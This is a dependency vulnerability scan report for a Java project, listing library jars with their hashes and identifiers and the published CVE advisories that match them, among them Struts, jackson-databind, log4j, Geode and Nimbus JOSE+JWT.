CWE: CWE-20 Improper Input Validation

Apache Struts 2 2.3.20 through 2.3.28.1 allows remote attackers to bypass intended access restrictions and conduct redirection attacks by leveraging a default method.

Vulnerable Software & Versions: (show all)

CVE-2016-4433  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-20 Improper Input Validation

Apache Struts 2 2.3.20 through 2.3.28.1 allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.

Vulnerable Software & Versions: (show all)

CVE-2016-4436  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Apache Struts 2 before 2.3.29 and 2.5.x before 2.5.1 allow attackers to have unspecified impact via vectors related to improper action name clean up.

Vulnerable Software & Versions: (show all)

CVE-2016-4438  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

The REST plugin in Apache Struts 2 2.3.20 through 2.3.28.1 allows remote attackers to execute arbitrary code via a crafted expression.

Vulnerable Software & Versions: (show all)

CVE-2016-4465  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The URLValidator class in Apache Struts 2 2.3.20 through 2.3.28.1 and 2.5.x before 2.5.1 allows remote attackers to cause a denial of service via a null value for a URL field.

Vulnerable Software & Versions: (show all)

CVE-2016-6795  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

In the Convention plugin in Apache Struts 2.3.20 through 2.3.30, it is possible to prepare a special URL which will be used for path traversal and execution of arbitrary code on server side.

Vulnerable Software & Versions: (show all)

CVE-2017-5638  

Severity:High
CVSS Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-20 Improper Input Validation

The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

Vulnerable Software & Versions: (show all)

CVE-2017-9787  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-284 Improper Access Control

When using a Spring AOP functionality to secure Struts actions it is possible to perform a DoS attack. Solution is to upgrade to Apache Struts version 2.5.12 or 2.3.33.

Vulnerable Software & Versions: (show all)

CVE-2017-9791  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

The Struts 1 plugin in Apache Struts 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.

Vulnerable Software & Versions: (show all)

CVE-2017-9805  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

The REST Plugin in Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.

Vulnerable Software & Versions: (show all)

CVE-2018-11776  

Severity:High
CVSS Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
CWE: CWE-20 Improper Input Validation

Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.

Vulnerable Software & Versions: (show all)

CVE-2018-1327  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The Apache Struts REST Plugin is using XStream library which is vulnerable and allow perform a DoS attack when using a malicious request with specially crafted XML payload. Upgrade to the Apache Struts version 2.5.16 and switch to an optional Jackson XML handler as described here http://struts.apache.org/plugins/rest/#custom-contenttypehandlers. Another option is to implement a custom XML handler based on the Jackson XML handler from the Apache Struts 2.5.16.

Vulnerable Software & Versions: (show all)

commons-collections4-4.1.jar

Description:

 The Apache Commons Collections package contains types that extend and augment the Java Collections Framework.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/commons/commons-collections4/4.1/commons-collections4-4.1.jar
MD5: 45af6a8e5b51d5945de6c7411e290bd1
SHA1: a4cf4688fe1c7e3a63aa636cc96d013af537768e
SHA256:b1fe8b5968b57d8465425357ed2d9dc695504518bed2df5b565c4b8e68c1c8a5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.commons:commons-collections4:4.1  Confidence:Highest
  • cpe: cpe:/a:apache:commons_collections:4.1  Confidence:Low  

wicket-core-7.10.0.jar

Description:

 
		Wicket is a Java web application framework that takes simplicity, 
		separation of concerns and ease of development to a whole new level. 
		Wicket pages can be mocked up, previewed and later revised using 
		standard WYSIWYG HTML design tools. Dynamic content processing and 
		form handling is all handled in Java code using a first-class 
		component model backed by POJO data beans that can easily be 
		persisted using your favorite technology. 
	

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/wicket/wicket-core/7.10.0/wicket-core-7.10.0.jar
MD5: f86b98c2b4c61cf1c344b9f294f08138
SHA1: ff61b2fb5a43947a9b94556d505bd708a663e003
SHA256:873518141d218016338c67b18414706532d96486e91a96ff149b9c1d01ab5713
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.wicket:wicket-core:7.10.0  Confidence:Highest
  • cpe: cpe:/a:apache:wicket:7.10.0  Confidence:Low  

findbugs-annotations-1.3.9-1.jar

Description:

 A clean room implementation of the Findbugs Annotations based entirely on the specification provided
    by the javadocs and at http://findbugs.sourceforge.net/manual/annotations.html.
  

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/github/stephenc/findbugs/findbugs-annotations/1.3.9-1/findbugs-annotations-1.3.9-1.jar
MD5: 70fda5202eb9d9ce4f250f2c2ba71152
SHA1: a6b11447635d80757d64b355bed3c00786d86801
SHA256:1e651066ed9ae35d7e3001d635d1dbba1c2965db0e4e33e2c14ad610543f225c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.github.stephenc.findbugs:findbugs-annotations:1.3.9-1  Confidence:Highest

jgroups-3.6.10.Final.jar

Description:

 
        Reliable cluster communication toolkit
    

License:

Apache License 2.0: http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/org/jgroups/jgroups/3.6.10.Final/jgroups-3.6.10.Final.jar
MD5: 54b56e09dd1583a0b07b113ddeeb3604
SHA1: fc0ff5a8a9de27ab62939956f705c2909bf86bc2
SHA256:46ddfd9d0c0c75b5dab967bb81a97efbe14f5b629ae590a633a4e983f5ea67de
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jgroups:jgroups:3.6.10.Final  Confidence:Highest

antlr-2.7.7.jar

Description:

 
    A framework for constructing recognizers, compilers,
    and translators from grammatical descriptions containing
    Java, C#, C++, or Python actions.
  

License:

BSD License: http://www.antlr.org/license.html
File Path: /Users/Kevin/.m2/repository/antlr/antlr/2.7.7/antlr-2.7.7.jar
MD5: f8f1352c52a4c6a500b597596501fc64
SHA1: 83cd2cd674a217ade95a4bb83a8a14f351f48bd0
SHA256:88fbda4b912596b9f56e8e12e580cc954bacfb51776ecfddd3e18fc1cf56dc4c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: antlr:antlr:2.7.7  Confidence:Highest

jackson-annotations-2.8.6.jar

Description:

 Core annotations used for value types, used by Jackson data binding package.
  

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.8.6/jackson-annotations-2.8.6.jar
MD5: 10b5d9fc0ab28d74ea1ef40988c7964d
SHA1: 9577018f9ce3636a2e1cb0a0c7fe915e5098ded5
SHA256:92d7580f361174bda3e015c66adafa326aeb9ef7f4a99a895486cef0dae773f8
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:fasterxml:jackson:2.8.6  Confidence:Low  
  • maven: com.fasterxml.jackson.core:jackson-annotations:2.8.6  Confidence:Highest

jackson-databind-2.8.6.jar

Description:

 General data-binding functionality for Jackson: works on core streaming API

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.8.6/jackson-databind-2.8.6.jar
MD5: b9bcc79b8b3883f627045b2da535e580
SHA1: c43de61f74ecc61322ef8f402837ba65b0aa2bf4
SHA256:922413ca2ff5a8f1f86a2eaae8ff02219322ec6ff00d212e7973df8aac4bbaa3
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.fasterxml.jackson.core:jackson-databind:2.8.6  Confidence:Highest
  • cpe: cpe:/a:fasterxml:jackson:2.8.6  Confidence:Low  
  • cpe: cpe:/a:fasterxml:jackson-databind:2.8.6  Confidence:Highest  

CVE-2017-15095  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

A deserialization flaw was discovered in the jackson-databind in versions before 2.8.10 and 2.9.1, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. This issue extends the previous flaw CVE-2017-7525 by blacklisting more classes that could be used maliciously.

Vulnerable Software & Versions: (show all)

CVE-2017-17485  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

FasterXML jackson-databind through 2.8.10 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.

Vulnerable Software & Versions: (show all)

CVE-2017-7525  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper.

Vulnerable Software & Versions: (show all)

CVE-2018-5968  

Severity:Medium
CVSS Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
CWE: CWE-184 Incomplete Blacklist

FasterXML jackson-databind through 2.8.11 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 and CVE-2017-17485 deserialization flaws. This is exploitable via two different gadgets that bypass a blacklist.

Vulnerable Software & Versions: (show all)

CVE-2018-7489  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-184 Incomplete Blacklist

FasterXML jackson-databind before 2.8.11.1 and 2.9.x before 2.9.5 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the c3p0 libraries are available in the classpath.

Vulnerable Software & Versions: (show all)

commons-lang-2.6.jar

Description:

 
        Commons Lang, a package of Java utility classes for the
        classes that are in java.lang's hierarchy, or are considered to be so
        standard as to justify existence in java.lang.
    

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-lang/commons-lang/2.6/commons-lang-2.6.jar
MD5: 4d5c1693079575b362edf41500630bbd
SHA1: 0ce1edb914c94ebc388f086c6827e8bdeec71ac2
SHA256:50f11b09f877c294d56f24463f47d28f929cf5044f648661c0f0cfbae9a2f49c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-lang:commons-lang:2.6  Confidence:Highest

fastutil-7.1.0.jar

Description:

 fastutil extends the Java Collections Framework by providing type-specific maps, sets, lists and priority queues with a small memory footprint and fast access and insertion; provides also big (64-bit) arrays, sets and lists, and fast, practical I/O classes for binary and text files.

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/it/unimi/dsi/fastutil/7.1.0/fastutil-7.1.0.jar
MD5: 35fc1f3aaab7a782873be02319a53828
SHA1: 9835253257524c1be7ab50c057aa2d418fb72082
SHA256:c266701bd7a4a2c36285862c1e682ccb7b5cb5b380d0de9bb1b34becf9e1c065
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: it.unimi.dsi:fastutil:7.1.0  Confidence:Highest

javax.transaction-api-1.2.jar

Description:

 Project GlassFish Java Transaction API

License:

CDDL + GPLv2 with classpath exception: https://glassfish.dev.java.net/nonav/public/CDDL+GPL.html
File Path: /Users/Kevin/.m2/repository/javax/transaction/javax.transaction-api/1.2/javax.transaction-api-1.2.jar
MD5: 2dfee184286530e726ad155816e15b4c
SHA1: d81aff979d603edd90dcd8db2abc1f4ce6479e3e
SHA256:9528449583c34d9d63aa1d8d15069790f925ae1f27b33784773b8099eff4c9ff
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.transaction:javax.transaction-api:1.2  Confidence:Highest

javax.resource-api-1.7.jar

Description:

 Java EE Connector Architecture API

License:

CDDL + GPLv2 with classpath exception: https://glassfish.dev.java.net/nonav/public/CDDL+GPL.html
File Path: /Users/Kevin/.m2/repository/javax/resource/javax.resource-api/1.7/javax.resource-api-1.7.jar
MD5: 51129256d155d7352fc1f066d2cbc6dc
SHA1: ae40e0864eb1e92c48bf82a2a3399cbbf523fb79
SHA256:216e0ac7018752122f3f44291aa816fc3a50504a79212a4397a194ad51308798
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.resource:javax.resource-api:1.7  Confidence:Highest

jna-4.0.0.jar

Description:

 Java Native Access

License:

LGPL, version 2.1: http://www.gnu.org/licenses/licenses.html
ASL, version 2: http://www.apache.org/licenses/
File Path: /Users/Kevin/.m2/repository/net/java/dev/jna/jna/4.0.0/jna-4.0.0.jar
MD5: a1e20e48a367063023db9137ceb7c63c
SHA1: 9b3a11c613ec3fd3440af4103b12c3de82d38b6e
SHA256:dac270b6441ce24d93a96ddb6e8f93d8df099192738799a6f6fcfc2b2416ca19
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.java.dev.jna:jna:4.0.0  Confidence:Highest

jopt-simple-5.0.3.jar

Description:

 A Java library for parsing command line options

License:

The MIT License: http://www.opensource.org/licenses/mit-license.php
File Path: /Users/Kevin/.m2/repository/net/sf/jopt-simple/jopt-simple/5.0.3/jopt-simple-5.0.3.jar
MD5: 0a5ec84e23df9d7cfb4063bc55f2744c
SHA1: cdd846cfc4e0f7eefafc02c0f5dce32b9303aa2a
SHA256:6f45c00908265947c39221035250024f2caec9a15c1c8cf553ebeecee289f342
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.sf.jopt-simple:jopt-simple:5.0.3  Confidence:Highest

log4j-core-2.7.jar

Description:

 The Apache Log4j Implementation

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/logging/log4j/log4j-core/2.7/log4j-core-2.7.jar
MD5: 2b63e0e5063fdaccf669a1e26384f3fd
SHA1: a3f2b4e64c61a7fc1ed8f1e5ba371933404ed98a
SHA256:5bb84e110d5f18cee47021a024d358227612dd6dac7b97fa781f85c6ad3ccee4
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.logging.log4j:log4j-core:2.7  Confidence:Highest
  • cpe: cpe:/a:apache:log4j:2.7  Confidence:Highest  

CVE-2017-5645  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.

Vulnerable Software & Versions: (show all)

shiro-core-1.3.2.jar

Description:

 Apache Shiro is a powerful and flexible open-source security framework that cleanly handles        authentication, authorization, enterprise session management, single sign-on and cryptography services.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/shiro/shiro-core/1.3.2/shiro-core-1.3.2.jar
MD5: 1c71224cdfa52fcba0a20b992195cf36
SHA1: b5dede9d890f335998a8ebf479809fe365b927fc
SHA256:2d5f2658e691012b9e62c6061fd817a98518d03e6370ab2f370d274835ca3a8c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.shiro:shiro-core:1.3.2  Confidence:Highest
  • cpe: cpe:/a:apache:shiro:1.3.2  Confidence:Low  

commons-beanutils-1.9.3.jar

Description:

 Apache Commons BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection.

License:

https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-beanutils/commons-beanutils/1.9.3/commons-beanutils-1.9.3.jar
MD5: 4a105c9d029a7edc6f2b16567d37eab6
SHA1: c845703de334ddc6b4b3cd26835458cb1cba1f3d
SHA256:c058e39c7c64203d3a448f3adb588cb03d6378ed808485618f26e137f29dae73
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:commons_beanutils:1.9.3  Confidence:Low  
  • maven: commons-beanutils:commons-beanutils:1.9.3  Confidence:Highest

fast-classpath-scanner-2.0.11.jar

Description:

 
	Uber-fast, ultra-lightweight Java classpath scanner. Scans the classpath by parsing the classfile  binary format directly rather than by using reflection.
	See https://github.com/lukehutch/fast-classpath-scanner
	

License:

The MIT License (MIT): http://opensource.org/licenses/MIT
File Path: /Users/Kevin/.m2/repository/io/github/lukehutch/fast-classpath-scanner/2.0.11/fast-classpath-scanner-2.0.11.jar
MD5: d2d38795baa2d167da1b82516db630d5
SHA1: ae34a7a5e6de8ad1f86e12f6f7ae1869fcfe9987
SHA256:ee7e4bf67b29338318c48caaf204f59de8fcb8d2f782fa315fffd0c60c7d5962
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: io.github.lukehutch:fast-classpath-scanner:2.0.11  Confidence:Highest

geode-core-1.2.1.jar

Description:

 Apache Geode provides a database-like consistency model, reliable transaction processing and a shared-nothing architecture to maintain very low latency performance with high concurrency processing

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/geode/geode-core/1.2.1/geode-core-1.2.1.jar
MD5: 03350317340b54a7c6e08e58ca201229
SHA1: fe853317e33dd2a1c291f29cee3c4be549f75a69
SHA256:63d6199a262afd27f479619731213d15f907b2c3b047d79685bc58afa4daae29
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.geode:geode-core:1.2.1  Confidence:Highest
  • cpe: cpe:/a:apache:geode:1.2.1  Confidence:Highest  

CVE-2017-12622  

Severity:Medium
CVSS Score: 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N)
CWE: CWE-200 Information Exposure

When an Apache Geode cluster before v1.3.0 is operating in secure mode and an authenticated user connects to a Geode cluster using the gfsh tool with HTTP, the user is able to obtain status information and control cluster members even without CLUSTER:MANAGE privileges.

Vulnerable Software & Versions: (show all)

CVE-2017-15692  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

In Apache Geode before v1.4.0, the TcpServer within the Geode locator opens a network port that deserializes data. If an unprivileged user gains access to the Geode locator, they may be able to cause remote code execution if certain classes are present on the classpath.

Vulnerable Software & Versions: (show all)

CVE-2017-15693  

Severity:Medium
CVSS Score: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

In Apache Geode before v1.4.0, the Geode server stores application objects in serialized form. Certain cluster operations and API invocations cause these objects to be deserialized. A user with DATA:WRITE access to the cluster may be able to cause remote code execution if certain classes are present on the classpath.

Vulnerable Software & Versions: (show all)

CVE-2017-15695  

Severity:Medium
CVSS Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

When an Apache Geode server versions 1.0.0 to 1.4.0 is configured with a security manager, a user with DATA:WRITE privileges is allowed to deploy code by invoking an internal Geode function. This allows remote code execution. Code deployment should be restricted to users with DATA:MANAGE privilege.

Vulnerable Software & Versions: (show all)

CVE-2017-15696  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

When an Apache Geode cluster before v1.4.0 is operating in secure mode, the Geode configuration service does not properly authorize configuration requests. This allows an unprivileged user who gains access to the Geode locator to extract configuration data and previously deployed application code.

Vulnerable Software & Versions: (show all)

CVE-2017-9795  

Severity:Medium
CVSS Score: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
CWE: CWE-200 Information Exposure

When an Apache Geode cluster before v1.3.0 is operating in secure mode, a user with read access to specific regions within a Geode cluster may execute OQL queries that allow read and write access to objects within unauthorized regions. In addition a user could invoke methods that allow remote code execution.

Vulnerable Software & Versions: (show all)

CVE-2017-9796  

Severity:Low
CVSS Score: 3.5 (AV:N/AC:M/Au:S/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

When an Apache Geode cluster before v1.3.0 is operating in secure mode, a user with read access to specific regions within a Geode cluster may execute OQL queries containing a region name as a bind parameter that allow read access to objects within unauthorized regions.

Vulnerable Software & Versions: (show all)

javax.persistence-2.1.0.jar

Description:

 EclipseLink build based upon Git transaction 3faac2b

License:

Eclipse Public License v1.0: http://www.eclipse.org/legal/epl-v10.html
Eclipse Distribution License v. 1.0: http://www.eclipse.org/org/documents/edl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/persistence/javax.persistence/2.1.0/javax.persistence-2.1.0.jar
MD5: da288f571e85f4a1a7f50cb8c9ef9bbd
SHA1: 5bab675816dbe0f64bb86004b108bf2a00292358
SHA256:227c4888011550cad0aed4c07e187b9f8e873c01558a08f014d288987415a9a9
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.persistence:javax.persistence:2.1.0  Confidence:Highest

commonj.sdo-2.1.1.jar

Description:

 EclipseLink build based upon Git transaction 9c3c264

License:

Eclipse Public License v1.0: http://www.eclipse.org/legal/epl-v10.html
Eclipse Distribution License v. 1.0: http://www.eclipse.org/org/documents/edl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/persistence/commonj.sdo/2.1.1/commonj.sdo-2.1.1.jar
MD5: 6e95eece101364642efe2d4543c8993c
SHA1: 90d4c89ce0a69f58619f1a247bbf420122139ff5
SHA256:b7ea9746f2c77e7261485b39b09938ca54e9cb58eb0d7c250a97d300b9a0dbbe
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.persistence:commonj.sdo:2.1.1  Confidence:Highest

eclipselink-2.5.2.jar

Description:

 EclipseLink build based upon Git transaction 9ad6abd

License:

Eclipse Public License v1.0: http://www.eclipse.org/legal/epl-v10.html
Eclipse Distribution License v. 1.0: http://www.eclipse.org/org/documents/edl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/persistence/eclipselink/2.5.2/eclipselink-2.5.2.jar
MD5: 18562489919fbec70cc77897a7a7bbb7
SHA1: cd2211635f3011e300ca8fedc1ce0e1cf61c175b
SHA256:67d175c1858005308ae9a02ff85c0bc7efc9a2a3c058a6838d51769f417f5247
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.persistence:eclipselink:2.5.2  Confidence:Highest

gateway-i18n-logging-log4j-0.10.0.jar

Description:

 An extension of the logging framework that integrates Log4J.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/knox/gateway-i18n-logging-log4j/0.10.0/gateway-i18n-logging-log4j-0.10.0.jar
MD5: 90c975d94d6e579bd4c29da76b7ca6fe
SHA1: 8887ab7157d97d51d53fe3963e23360579d341f8
SHA256:62412868890370bb9c2aeafbeca2c648c1a5f7c19ac933cbfaefcaa8217c51a2
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:log4j:0.10.0  Confidence:Low  
  • maven: org.apache.knox:gateway-i18n-logging-log4j:0.10.0  Confidence:Highest

apacheds-i18n-2.0.0-M5.jar

Description:

 Internationalization of errors and other messages

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/directory/server/apacheds-i18n/2.0.0-M5/apacheds-i18n-2.0.0-M5.jar
MD5: 8b62adb819490e47cada8fe9fecce26f
SHA1: a94114a538f8a6020f1728b05e06941ea74f079c
SHA256:7130fd997be445dd29d4fc4bdf39560cb34c95cee657fcf26ed9292388295139
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.directory.server:apacheds-i18n:2.0.0-M5  Confidence:Highest

apacheds-jdbm-2.0.0-M5.jar

Description:

 Specific JDBM Implementation

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/directory/server/apacheds-jdbm/2.0.0-M5/apacheds-jdbm-2.0.0-M5.jar
MD5: c77336eeb5ae8b3e081345ce26ea47ef
SHA1: fcb14d6453ccf74e124fe352df3f671af680af7c
SHA256:a5c0003c9be871bfc348c8f31f1c4d00ad270fbdfb2a18cda9feba647d009f69
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.directory.server:apacheds-jdbm:2.0.0-M5  Confidence:Highest

json-smart-1.3.1.jar

Description:

 
    JSON (JavaScript Object Notation) is a lightweight data-interchange format.
    It is easy for humans to read and write. It is easy for machines to parse and generate.
    It is based on a subset of the JavaScript Programming Language, Standard ECMA-262 3rd Edition
    - December 1999. JSON is a text format that is completely language independent but uses
    conventions that are familiar to programmers of the C-family of languages, including C, C++, C#,
    Java, JavaScript, Perl, Python, and many others.
    These properties make JSON an ideal data-interchange language.
	

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/net/minidev/json-smart/1.3.1/json-smart-1.3.1.jar
MD5: b4f09b247c03cc2d091502d5b1db1f7f
SHA1: 69b3835e96d282ec85fc2e1517b8164c45ed639e
SHA256:ac3689112788e042088755e63ecd1f689adfeb04d7fb1cfd244513f94f82522c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.minidev:json-smart:1.3.1  Confidence:Highest

nimbus-jose-jwt-4.11.jar

Description:

 
        Java library for Javascript Object Signing and Encryption (JOSE) and
        JSON Web Tokens (JWT)
    

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/nimbusds/nimbus-jose-jwt/4.11/nimbus-jose-jwt-4.11.jar
MD5: 4937436b091719cc6ad75ee61a4f1e2b
SHA1: 9409f5b0a69dc17fa426ac3d65c9d46990df2770
SHA256:cab3445297d9a39ad63ed9d63a2471d58e447c2e3eaecabc87b01b6f751de6f3
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2017-12972  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-345 Insufficient Verification of Data Authenticity

In Nimbus JOSE+JWT before 4.39, there is no integer-overflow check when converting length values from bytes to bits, which allows attackers to conduct HMAC bypass attacks by shifting Additional Authenticated Data (AAD) and ciphertext so that different plaintext is obtained for the same HMAC.

Vulnerable Software & Versions: (show all)

CVE-2017-12973  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

Nimbus JOSE+JWT before 4.39 proceeds improperly after detection of an invalid HMAC in authenticated AES-CBC decryption, which allows attackers to conduct a padding oracle attack.

Vulnerable Software & Versions: (show all)

CVE-2017-12974  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

Nimbus JOSE+JWT before 4.36 proceeds with ECKey construction without ensuring that the public x and y coordinates are on the specified curve, which allows attackers to conduct an Invalid Curve Attack in environments where the JCE provider lacks the applicable curve validation.

Vulnerable Software & Versions: (show all)

json-path-0.9.1.jar

Description:

 Java JsonPath implementation

License:

http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/com/jayway/jsonpath/json-path/0.9.1/json-path-0.9.1.jar
MD5: 4a988b13309eb8dc724e20dd81b7578d
SHA1: 1a198cf545b2656656fecda5add3ba436e715185
SHA256:5a3f7746983bc88e8b04c30bd1e934aa9ef197c9f64d2ae7e05cfb108184c5f3
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.jayway.jsonpath:json-path:0.9.1  Confidence:Highest

gateway-spi-0.10.0.jar

Description:

 The Service Provider Interface for extending the capabilities of the gateway.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/knox/gateway-spi/0.10.0/gateway-spi-0.10.0.jar
MD5: 4814f10fddb58c3ed8182be2088b928b
SHA1: b91bca88e79ea485ddc78c6ed67c11f416a1b568
SHA256:e6cf7ad413a67a7665b9925b9e01b86611dbe1d6d55ebfc67af18c309f640a59
Referenced In Project/Scope:trial:compile

Identifiers

